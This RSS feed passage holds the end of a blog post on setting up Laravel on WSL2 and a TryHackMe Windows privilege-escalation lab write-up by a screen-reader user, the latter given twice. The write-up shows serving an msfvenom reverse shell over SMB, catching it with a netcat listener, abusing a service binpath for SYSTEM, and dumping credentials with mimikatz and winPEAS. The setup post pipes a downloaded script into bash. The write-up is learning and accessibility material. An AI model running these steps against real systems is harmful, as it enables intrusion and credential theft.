There are two ways to do this: running “takeout enable” gives a menu you can arrow through, but given Windows screenreaders haven&#39;t figured out console highlight tracking yet, you&#39;ll probably want to provide the service name yourself, e.g. “takeout enable postgresql”. Follow the instructions and Postgres will run on 127.0.0.1 for projects to use.</p>

<h3 id="setting-up-dns-resolution-to-the-wsl2-instance">Setting up DNS resolution to the WSL2 instance</h3>

<p>A cool thing about Valet is that it autoconfigures new projects to be reachable on the *.test domain, routing those to localhost. Except ...WSL2&#39;s localhost isn&#39;t our localhost.
We can add entries for individual sites to C:/Windows/System32/drivers/etc/hosts to route each host to 127.0.0.1 individually, or we can use the .localhost top-level domain. To my knowledge, only Chrome currently supports this. If you want to go that route:</p>

<pre><code>valet domain localhost
</code></pre>

<h3 id="installing-laravel">Installing Laravel</h3>

<p>We can install Laravel in several ways; here are a few.</p>

<h4 id="using-docker-and-laravel-sail">Using Docker and Laravel Sail</h4>

<p>Given we already have Docker set up, we can use a relatively new addition to the Laravel ecosystem, Laravel Sail. To do this, run the following, where the bit after the TLD is the name of the folder for the project:</p>

<pre><code>curl -s https://laravel.build/helloWorld | bash
</code></pre>

<p>This will do a whole bunch of Docker magic, after which your application will be accessible on projectname.localhost from Chrome. You can <a href="https://laravel.com/docs/8.x/sail">read more about Laravel Sail here</a>.</p>

<h4 id="using-composer">Using Composer</h4>

<p>We have Composer installed and ready to go, so an alternate way of doing this is by using our already existing infrastructure:</p>

<pre><code>composer global require laravel/installer
laravel new &lt;project name&gt;
</code></pre>

<h3 id="conclusion">Conclusion</h3>

<p>From here, the existing docs can take over. VS Code is a topic in itself, and will probably merit its own post at some point. Using the various extensions it provides, you can work within the WSL2 container, set up your PHP tools on the WSL2 side in order to get linting and static checking support etc.
That&#39;s enough out of me for now.</p>
]]></content:encoded>
      <guid>https://florianbeijers.xyz/setting-up-a-php-laravel-environment-on-wsl2-and-windows</guid>
      <pubDate>Sat, 06 Mar 2021 23:44:48 +0000</pubDate>
    </item>
    <item>
      <title>THM Windows PrivEsc box with a Screen Reader</title>
      <link>https://florianbeijers.xyz/thm-windows-privesc-box-with-a-screen-reader?pk_campaign=rss-feed</link>
      <description>&lt;![CDATA[Intro&#xA;This year, I have committed to learning more about cybersecurity. This has always been an interest of mine but I never could find the time and resources to properly level up on this particular topic. I do now, and it&#39;s been a lot of fun so far.&#xA;Through a bit of luck I got my hands on a voucher for TryHackMe which, together with the circumstances we&#39;re in right now, gave me the means to properly pursue this interest.&#xA;&#xA;So far, I have been following the so-called &#34;Complete Beginner Learning Path&#34;, which essentially allows you to dip your toes into various aspects of this field.&#xA;It covers things like basic networking, Linux fundamentals and simple vulnerability exploitation through little project-based, learn-as-you-go-style challenges called rooms, in which bite-sized helpings of theory are interspersed with exercises and attack simulations to put what you&#39;ve just learned to use in a more practical setting.&#xA;Why this room in particular?&#xA;Most rooms so far, I have been able to complete successfully with a screenreader without doing all that much to dodge around accessibility restrictions. The only time this came up was when using an actual GUI tool to analyze web traffic, and I&#39;m sure I&#39;ll add a write-up of that particular room one day as well. This room however had me scratching my head for a minute, because your only starting point is RDP, which is completely inaccessible as it only passes along bitmaps of the target machine, no actual info a screen reader can do anything with.&#xA;I managed to dodge around it, and the way I describe it here is obviously not a pleasant way of working at all. RDP, for blind hackers, should probably always be an absolute last resort, preferring almost anything over actually using this as a way in. 
What follows next is what would happen if you have absolutely no other recourse left, and is not representative of how difficult hacking is for screenreader users in general. The majority of things I have come in contact with so far, including web application hacking and wireless packet analysis, is easier and more doable by several orders of magnitude given the right tools are used, many of which are industry standard.&#xA;The actual write-up so the TLDR folks can quickly skip to this part&#xA;As a point of principle, I am not going to be adding screenshots to these posts. There&#39;s a dime a dozen posts on Medium that do this already, and the target audience of this post either won&#39;t find them useful anyway, or will have to deal with the fact I am forcing the reader immersion into my workflow by only giving them information I myself have access to. That inadvertently means this is a bit of a wall of text. Ehh ...sorry about that :) Anyway, here we go.&#xA;&#xA;Initial Foothold: Oh no RDP!&#xA;I&#39;m sure I could have run metasploit against this box, set it to look for vulnerabilities, get a coffee and come back to it having exploited, owned, neutralized and packed up the box for shipping, but where&#39;s the fun in that?&#xA;Fortunately, we only really need the GUI for a very brief interval on this particular engagement. RDP is not a good attack vector for a blind person to depend on as you&#39;ll soon discover, but hey, living off the land and all that.&#xA;The first thing I tried was to use the browser-based attackbox THM offers you to RDP into the machine. To my delight, sound actually works on these by default which probably means I can install Orca on it and have it talk to me, but something for another time. 
TODO: Poke someone at THM about having it be installed by default so I don&#39;t have to write a BASH script to do it for me; these boxes only stay up a couple of hours at a time.&#xA;I quickly noticed that using NVDA&#39;s OCR feature on the output of the browser-based machine just wasn&#39;t going to work; there were too many recognition errors to really make anything of the output so I quickly abandoned that idea.&#xA;Next idea: I am running Windows, the box is running Windows, the protocol is RDP. I should just be able to use Remote Desktop to log in, maybe that gives us a clearer picture. I&#39;d have to hook up to the VPN, but that&#39;s doable enough.&#xA;This thing where at times I need to use two operating systems in tandem isn&#39;t new, in my day job as a developer this happens all the time as well.&#xA;&#xA;It ... does work better, actually. After logging in, and getting myself stuck because I wasn&#39;t aware ctrl+alt+break of all things is how you stop sending input to the remote session, the OCR results are quite a bit clearer. Still garbage, but lego-brick-shaped garbage we can actually do something with, kinda.&#xA;&#xA;We screenreader users have to pretty much depend on keyboard shortcuts for the majority of things, so opening up a commandline blind (heh) is something I don&#39;t even have to think about. Windows+r, cmd, RET.&#xA;crickets&#xA;We need to verify if it actually worked, as there is no screenreader feedback whatsoever while this is happening.&#xA;&#xA;Ctrl+alt+break, nvda+r:&#xA; Rec)/de B Select C:\Windows\system32\CMD.e  e AdminPai PrivESC ~ Shoncw Microsoft Windows [Version 10.6.17763.737] (C) 2618 Microsoft Corporation. All rights reserved C: \Users\user‘ &#xA;&#xA;I know that looks horrid. I&#39;m not going to clean it up. That is what I got back, that&#39;s what I&#39;ll have to deal with. What do we know from this?&#xA;&#xA;This is a Windows 10 box, albeit a somewhat older one.&#xA;We are user, and we are in c:\users\user. 
We have write-access there, which is good.&#xA;We may be focused on the prompt line. The fact the word &#34;Select&#34; is in this output worries me, as that may mean we are not. Hammering down arrow should make sure we are.&#xA;&#xA;Now, all we really need to do here is make sure we get the msfvenom-generated reverse shell over to this box, so we can stop messing around with garbled OCR results and actually get some work done. The idea to use SMB for this, as the room suggests, seems as good a one as any, so let&#39;s do that.&#xA;On the attacking machine:&#xA; python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali .&#xA;&#xA;Some explanatory output is returned, the server is just hanging out where we told it to, so now the fun part begins.&#xA;We actually need to perform a command on the remote session to grab our little innocent reverse.exe. I&#39;m sure that just flips strings around. Yes ...that is most certainly what it does, it&#39;s great fun. ;)&#xA;There are a few ways to paste into a Windows commandline window. There&#39;s the system menu&#39;s edit submenu, there&#39;s a right-click in the right spot, and there&#39;s plain old ctrl+v which doesn&#39;t always work. A quick check, I&#39;ll spare you the garbled mess this time, reveals that ctrl+v does work in this case.&#xA;&#xA;This is good since it means we can make sure the command we are about to feed to the remote session is free of errors. Feedback in an RDP session is nonexistent, so we can&#39;t see what we&#39;re typing, but we can write the command somewhere else and paste it in there with ctrl+v. Pay attention, there&#39;s a quiz on these later. 
;)&#xA;&#xA;On the remote Windows box:&#xA; copy \\10.10.59.243\kali\reverse.exe .&#xA;And again, ctrl+alt+break, NVDA+r:&#xA; C \Users\user  copy \\10.10.59.243\kali\reverse.exe 1 file(s) copied C:\Users\user  DIR DIR DIR DIR DIR DIR DIR DIR DIR DIR DIR DIR DIR DIR Rec)/C|9 B C:\Windows\system32\cmd.exe C \Users\user  copy \\10.10.59.243\kali\reverse.exe The network path was not found. 3D Objects Contacts Desktop Documents Downloads Favorites Links Music Pictures Saved Games Searches Videos 0 File(s) 0 bytes 14 Dir(s) 30,835,068,928 bytes free == /O Type here to Search O Q&#39; M   &lt;&#xA;I have to point out that I am writing this as I&#39;m doing it, and throughout doing that I lost the machine for a while so had to retrace my steps. The output is entirely in the wrong order; my SMB server on the attack box didn&#39;t properly come up the first time which is why copy initially didn&#39;t work, but we can see in that horrible mess that we managed to copy the file. Hurray, we almost have a real shell. And yes, I use that term scathingly, because heck, netcat is better than this.&#xA;&#xA;Speaking of netcat, all we now really need to do is make sure to run reverse.exe, which shouldn&#39;t give us any output. Just imagine I did that, right after starting a netcat listener for it to reverse-shell its way into:&#xA; root@kali:~# nc -lvp 5300&#xA;listening on [any] 5300 ...&#xA;connect to [10.10.59.243] from ip-10-10-28-85.eu-west-1.compute.internal [10.10.28.85] 49778&#xA;Microsoft Windows [Version 10.0.17763.737]&#xA;(c) 2018 Microsoft Corporation. All rights reserved.&#xA;&#xA;C:\Users\user  Woohoo! No more garble garble. 
We can actually perform the actions we need to do to complete the room from here on out.&#xA;Now for the people watching at home, I deviated from the room in two minor ways to essentially cover my behind in case this would&#39;ve gone south:&#xA;&#xA;I copied the file to the user folder, rather than c:\privesc as indicated, because I wasn&#39;t sure if I would have writing perms there and I did not want to deal with that over an RDP shell.&#xA;I deliberately picked a port over 1024 to not have to use sudo on the kali box which in hindsight probably wasn&#39;t entirely necessary, but there you have it.&#xA;&#xA;Rest of the tasks&#xA;&#xA;I might as well finish this up while I&#39;m here. This isn&#39;t a walkthrough per se, more of a &#34;yo, this is what I ran into&#34; stream-of-consciousness kind of post. I will briefly describe my subsequent steps, unless we run into another fun accessibility challenge of course.&#xA;&#xA;The task we just did was task 2, which is the simplest task in the room. Go figure :)&#xA;Task 3 requires us to first copy to the c:\privesc folder which conveniently holds a bunch of privilege escalation tools for us. Thanks, VM creators, saves me a few downloads :)&#xA;&#xA;The room takes us through checking a service&#39;s access rights for the given user, and then through changing the binpath to our reverse.exe shell which then connects to a second netcat listener on the same port in order to give us a netcat shell with local system privileges. No real accessibility hurdle here, apart from needing to make very sure you get the binpath invocation exactly right, spacing and all. Use at least &#34;most&#34; for a screen reader&#39;s punctuation setting or go character by character. Or use braille, which makes all of this SO much easier.&#xA;&#xA;This remains true for the following tasks. All of it is commandline-based, even the registry can be efficiently queried using the commandline. 
In my case there was a hurdle in the fact that there were no creds in the winLogon registry key where there were supposed to be some, but winPeas to the rescue there in combination with one of the privilege escalation methods we already covered to get system-level privileges. Cheating just a little, I&#39;m aware.&#xA;&#xA;Two more tricky bits happened throughout this particular room:&#xA;&#xA;Unfortunately the infoSec community does not appear to be immune to the consequences of Python 2.7 reaching end of life. Kali has marched on, but some tools, notably creddump7, have not. I was unable to get it to run, nor its various forks which claim python3 compatibility. Task 11 will require you to use some other tool; I used mimikatz even though that required me to craft another copy command for the remote session because that tool, at least to my knowledge, needs to be run on the target itself. egh. :(&#xA;&#xA;Towards the end, the room wants you to run powershell as admin, telling you to right-click it and select &#34;Run as Administrator&#34;. You can do that from the keyboard with win+r, powershell, ctrl+shift+enter, alt+y. People writing duckyscript exploits pay attention ;)&#xA;&#xA;Extra Credit&#xA;&#xA;There are screenreaders out there that have the ability to perform their own brand of remote access. This, chiefly, because the existing ones just flat out don&#39;t work very well. Generally they use a server somewhere as a go-between, relying on an almost TeamViewer-like exchange of keys to connect to each other.&#xA;If you feel you can get away with storing a preconfigured copy of such a screenreader on the target, it should theoretically be relatively painless to set up a connection to that copy and do the RDP stuff that way.&#xA;Obviously that would make the target system spit out a whole bunch of TTS chatter over the default audio device before you have a chance to kill the sound, so it&#39;s not exactly stealthy, but hey ...it&#39;s just another tool. 
:) For VMs, it might actually work better. For actual engagements ...ehh ...maybe not so much.&#xA;&#xA;Conclusion&#xA;&#xA;I won&#39;t lie. This room was frustrating, it was hard. It took way longer than it probably should have.&#xA;Not because the material covered was particularly hard; it wasn&#39;t, not all that much in any case. It was hard because of all the extra effort to make sure the RDP parts go well, to make sure you don&#39;t accidentally kill the netcat listener with a careless ctrl+c as that means you have to do the same song and dance all over again.&#xA;It was hard because I had to figure out some deviations from the instructions; creddump7 didn&#39;t work, I had to fall back to winPEAS to get a stored set of creds that I couldn&#39;t seem to find in the place they should&#39;ve been.&#xA;It was hard because the target would inexplicably go down now and again making me have to do the RDP process described above at least 5-6 times. I&#39;ve gotten faster at it :)&#xA;It was hard. I&#39;m going to do it again. :)&#xA;]]&gt;</description>
      <content:encoded><![CDATA[<h3 id="intro">Intro</h3>

<p>This year, I have committed to learning more about cybersecurity. This has always been an interest of mine but I never could find the time and resources to properly level up on this particular topic. I do now, and it&#39;s been a lot of fun so far.

Through a bit of luck I got my hands on a voucher for <a href="https://tryhackme.com">TryHackMe</a> which, together with the circumstances we&#39;re in right now, gave me the means to properly pursue this interest.</p>

<p>So far, I have been following the so-called “Complete Beginner Learning Path”, which essentially allows you to dip your toes into various aspects of this field.
It covers things like basic networking, Linux fundamentals and simple vulnerability exploitation through little project-based, learn-as-you-go-style challenges called rooms, in which bite-sized helpings of theory are interspersed with exercises and attack simulations to put what you&#39;ve just learned to use in a more practical setting.</p>

<h3 id="why-this-room-in-particular">Why this room in particular?</h3>

<p>Most rooms so far, I have been able to complete successfully with a screenreader without doing all that much to dodge around accessibility restrictions. The only time this came up was when using an actual GUI tool to analyze web traffic, and I&#39;m sure I&#39;ll add a write-up of that particular room one day as well. This room however had me scratching my head for a minute, because your only starting point is RDP, which is completely inaccessible as it only passes along bitmaps of the target machine, no actual info a screen reader can do anything with.
I managed to dodge around it, and the way I describe it here is obviously not a pleasant way of working at all. RDP, for blind hackers, should probably always be an absolute last resort, preferring almost anything over actually using this as a way in. What follows next is what would happen if you have absolutely no other recourse left, and is not representative of how difficult hacking is for screenreader users in general. The majority of things I have come in contact with so far, including web application hacking and wireless packet analysis, is easier and more doable by several orders of magnitude given the right tools are used, many of which are industry standard.</p>

<h3 id="the-actual-write-up-so-the-tldr-folks-can-quickly-skip-to-this-part">The actual write-up so the TLDR folks can quickly skip to this part</h3>

<p>As a point of principle, I am not going to be adding screenshots to these posts. There&#39;s a dime a dozen posts on Medium that do this already, and the target audience of this post either won&#39;t find them useful anyway, or will have to deal with the fact I am forcing the reader immersion into my workflow by only giving them information I myself have access to. That inadvertently means this is a bit of a wall of text. Ehh ...sorry about that :) Anyway, here we go.</p>

<h4 id="initial-foothold-oh-no-rdp">Initial Foothold: Oh no RDP!</h4>

<p>I&#39;m sure I could have run metasploit against this box, set it to look for vulnerabilities, get a coffee and come back to it having exploited, owned, neutralized and packed up the box for shipping, but where&#39;s the fun in that?
Fortunately, we only really need the GUI for a very brief interval on this particular engagement. RDP is not a good attack vector for a blind person to depend on as you&#39;ll soon discover, but hey, living off the land and all that.
The first thing I tried was to use the browser-based attackbox THM offers you to RDP into the machine. To my delight, sound actually works on these by default which probably means I can install Orca on it and have it talk to me, but something for another time. TODO: Poke someone at THM about having it be installed by default so I don&#39;t have to write a BASH script to do it for me; these boxes only stay up a couple of hours at a time.
I quickly noticed that using NVDA&#39;s OCR feature on the output of the browser-based machine just wasn&#39;t going to work; there were too many recognition errors to really make anything of the output so I quickly abandoned that idea.
Next idea: I am running Windows, the box is running Windows, the protocol is RDP. I should just be able to use Remote Desktop to log in, maybe that gives us a clearer picture. I&#39;d have to hook up to the VPN, but that&#39;s doable enough.
This thing where at times I need to use two operating systems in tandem isn&#39;t new, in my day job as a developer <a href="https://www.freecodecamp.org/news/blind-developer-sighted-team/">this happens all the time as well</a>.</p>

<p>It ... does work better, actually. After logging in, and getting myself stuck because I wasn&#39;t aware ctrl+alt+break of all things is how you stop sending input to the remote session, the OCR results are quite a bit clearer. Still garbage, but lego-brick-shaped garbage we can actually do something with, kinda.</p>

<p>We screenreader users have to pretty much depend on keyboard shortcuts for the majority of things, so opening up a commandline blind (heh) is something I don&#39;t even have to think about. Windows+r, cmd, RET.
<em>crickets</em>
We need to verify if it actually worked, as there is no screenreader feedback whatsoever while this is happening.</p>

<p>Ctrl+alt+break, nvda+r:</p>

<pre><code> Rec)/de B Select C:\Windows\system32\CMD.e&gt;&lt;e AdminPai PrivESC ~ Shoncw Microsoft Windows [Version 10.6.17763.737] (C) 2618 Microsoft Corporation. All rights reserved C: \Users\user&gt;‘ 
</code></pre>

<p>I know that looks horrid. I&#39;m not going to clean it up. That is what I got back, that&#39;s what I&#39;ll have to deal with. What do we know from this?</p>
<ul><li>This is a Windows 10 box, albeit a somewhat older one.</li>
<li>We are user, and we are in c:\users\user. We have write-access there, which is good.</li>
<li>We may be focused on the prompt line. The fact the word “Select” is in this output worries me, as that may mean we are not. Hammering down arrow should make sure we are.</li></ul>

<p>Now, all we really need to do here is make sure we get the msfvenom-generated reverse shell over to this box, so we can stop messing around with garbled OCR results and actually get some work done. The idea to use SMB for this, as the room suggests, seems as good a one as any, so let&#39;s do that.
On the attacking machine:</p>

<pre><code>python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali .
</code></pre>

<p>Some explanatory output is returned, the server is just hanging out where we told it to, so now the fun part begins.
We actually need to perform a command on the remote session to grab our little innocent reverse.exe. I&#39;m sure that just flips strings around. Yes ...that is most certainly what it does, it&#39;s great fun. ;)
There are a few ways to paste into a Windows commandline window. There&#39;s the system menu&#39;s edit submenu, there&#39;s a right-click in the right spot, and there&#39;s plain old ctrl+v which doesn&#39;t always work. A quick check, I&#39;ll spare you the garbled mess this time, reveals that ctrl+v does work in this case.</p>

<p>This is good since it means we can make sure the command we are about to feed to the remote session is free of errors. Feedback in an RDP session is nonexistent, so we can&#39;t see what we&#39;re typing, but we can write the command somewhere else and paste it in there with ctrl+v. Pay attention, there&#39;s a quiz on these later. ;)</p>

<p>On the remote Windows box:</p>

<pre><code>copy \\10.10.59.243\kali\reverse.exe .
</code></pre>

<p>And again, ctrl+alt+break, NVDA+r:</p>

<pre><code> C \Users\user&gt;copy \\10.10.59.243\kali\reverse.exe 1 file(s) copied C:\Users\user&gt;_ &lt;DIR&gt; &lt;DIR&gt; &lt;DIR&gt; &lt;DIR&gt; &lt;DIR&gt; &lt;DIR&gt; &lt;DIR&gt; &lt;DIR&gt; &lt;DIR&gt; &lt;DIR&gt; &lt;DIR&gt; &lt;DIR&gt; &lt;DIR&gt; &lt;DIR&gt; Rec)/C|9 B C:\Windows\system32\cmd.exe C \Users\user&gt;copy \\10.10.59.243\kali\reverse.exe The network path was not found. 3D Objects Contacts Desktop Documents Downloads Favorites Links Music Pictures Saved Games Searches Videos 0 File(s) 0 bytes 14 Dir(s) 30,835,068,928 bytes free == /O Type here to Search O Q&#39; _M &gt;&lt;
</code></pre>

<p>I have to point out that I am writing this as I&#39;m doing it, and throughout doing that I lost the machine for a while so had to retrace my steps. The output is entirely in the wrong order; my SMB server on the attack box didn&#39;t properly come up the first time which is why copy initially didn&#39;t work, but we can see in that horrible mess that we managed to copy the file. Hurray, we almost have a real shell. And yes, I use that term scathingly, because heck, netcat is better than this.</p>

<p>Speaking of netcat, all we now really need to do is make sure to run reverse.exe, which shouldn&#39;t give us any output. Just imagine I did that, right after starting a netcat listener for it to reverse-shell its way into:</p>

<pre><code> root@kali:~# nc -lvp 5300
listening on [any] 5300 ...
connect to [10.10.59.243] from ip-10-10-28-85.eu-west-1.compute.internal [10.10.28.85] 49778
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\user&gt;
</code></pre>

<p>Woohoo! No more garble garble. We can actually perform the actions we need to do to complete the room from here on out.
Now for the people watching at home, I deviated from the room in two minor ways to essentially cover my behind in case this would&#39;ve gone south:</p>
<ul><li>I copied the file to the user folder, rather than c:\privesc as indicated, because I wasn&#39;t sure if I would have write permissions there and I did not want to deal with that over an RDP shell.</li>
<li>I deliberately picked a port over 1024 to not have to use sudo on the kali box which in hindsight probably wasn&#39;t entirely necessary, but there you have it.</li></ul>

<h4 id="rest-of-the-tasks">Rest of the tasks</h4>

<p>I might as well finish this up while I&#39;m here. This isn&#39;t a walkthrough per se, more of a “yo, this is what I ran into” stream-of-consciousness kind of post. I will briefly describe my subsequent steps, unless we run into another fun accessibility challenge of course.</p>

<p>The task we just did was task 2, which is the simplest task in the room. Go figure :)
Task 3 requires us to first copy to the c:\privesc folder which conveniently holds a bunch of privilege escalation tools for us. Thanks, VM creators, saves me a few downloads :)</p>

<p>The room takes us through checking a service&#39;s access rights for the given user, and then through changing the binpath to our reverse.exe shell, which then connects to a second netcat listener on the same port in order to give us a netcat shell with local system privileges. No real accessibility hurdle here, apart from needing to make very sure you get the binpath invocation exactly right, spacing and all. Use at least “most” for a screen reader&#39;s punctuation setting or go character by character. Or use braille, which makes all of this SO much easier.</p>

<p>This remains true for the following tasks. All of it is command-line based; even the registry can be efficiently queried from the command line. In my case there was a hurdle in the fact that there were no creds in the Winlogon registry key where there were supposed to be some, but winPEAS came to the rescue there in combination with one of the privilege escalation methods we already covered to get system-level privileges. Cheating just a little, I&#39;m aware.</p>

<p>Two more tricky bits happened throughout this particular room:</p>
<ul><li><p>Unfortunately the infosec community does not appear to be immune to the consequences of Python 2.7 reaching end of life. Kali has marched on, but some tools, notably creddump7, have not. I was unable to get it to run, nor its various forks which claim Python 3 compatibility. Task 11 will require you to use some other tool; I used mimikatz even though that required me to craft another copy command for the remote session because that tool, at least to my knowledge, needs to be run on the target itself. egh. :(</p></li>

<li><p>Towards the end, the room wants you to run powershell as admin, telling you to right-click it and select “Run as Administrator”. You can do that from the keyboard with win+r, powershell, ctrl+shift+enter, alt+y. People writing duckyscript exploits pay attention ;)</p></li></ul>

<h3 id="extra-credit">Extra Credit</h3>

<p>There are screen readers out there that have the ability to perform their own brand of remote access. This, chiefly, because the existing ones just flat out don&#39;t work very well. Generally they use a server somewhere as a go-between, relying on an almost TeamViewer-like exchange of keys to connect to each other.
If you feel you can get away with storing a preconfigured copy of such a screen reader on the target, it should theoretically be relatively painless to set up a connection to that copy and do the RDP stuff that way.
Obviously that would make the target system spit out a whole bunch of TTS chatter over the default audio device before you have a chance to kill the sound, so it&#39;s not exactly stealthy, but hey ...it&#39;s just another tool. :) For VMs, it might actually work better. For actual engagements ...ehh ...maybe not so much.</p>

<h3 id="conclusion">Conclusion</h3>

<p>I won&#39;t lie. This room was frustrating, it was hard. It took way longer than it probably should have.
Not because the material covered was particularly hard; it wasn&#39;t, not all that much in any case. It was hard because of all the extra effort to make sure the RDP parts go well, to make sure you don&#39;t accidentally kill the netcat listener with a careless ctrl+c, as that means you have to do the same song and dance all over again.
It was hard because I had to figure out some deviations from the instructions; creddump7 didn&#39;t work, and I had to fall back to winPEAS to get a stored set of creds that I couldn&#39;t seem to find in the place they should&#39;ve been.
It was hard because the target would inexplicably go down now and again, which meant I had to do the RDP process described above at least 5-6 times. I&#39;ve gotten faster at it :)
It was hard. I&#39;m going to do it again. :)</p>
]]></content:encoded>
      <guid>https://florianbeijers.xyz/thm-windows-privesc-box-with-a-screen-reader</guid>
      <pubDate>Thu, 25 Feb 2021 17:58:31 +0000</pubDate>
    </item>
  </channel>
</rss>